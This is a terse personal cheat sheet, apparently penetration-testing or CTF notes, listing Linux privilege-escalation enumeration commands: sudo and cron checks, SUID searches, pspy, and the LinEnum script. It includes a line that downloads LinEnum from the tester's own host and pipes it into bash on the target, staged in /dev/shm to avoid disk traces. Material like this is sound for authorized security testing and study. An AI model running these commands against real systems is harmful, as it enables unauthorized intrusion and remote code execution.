2 Enums
Start
sudo -l
crontab -l
ps auxww
uname -a
find / -type f -a (-perm -u+s -o -perm -g+s ) -exec ls -l {} ; 2> /dev/null
pspy ..snoop processes
find / -type f -user www-data 2>/dev/null ..files
find / -type d -user www-data 2>/dev/null ..dirsLinEnum
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
cp /opt/LinEnum/LinEnum.sh .
python -m SimpleHTTPServer 80
cd /dev/shm/ ..ramdisk (data wont actually save to disk)
cd /tmp ..optional (way i've been doing it)
curl $MyIP:8000/LinEnum.sh -t | bash ..Easy execute and Thorough
curl $MyIP:8000/LinEnum.sh -o LinEnum.sh ..Download
LinEnum.sh -h ..help
LinEnum.sh -k password -e export -t ..keyword, export, thoroughPsPy32
Timers
Tools
REFS
Bonus Enums:
SUID/SGID
Writeable
Enumeration Plan
Last updated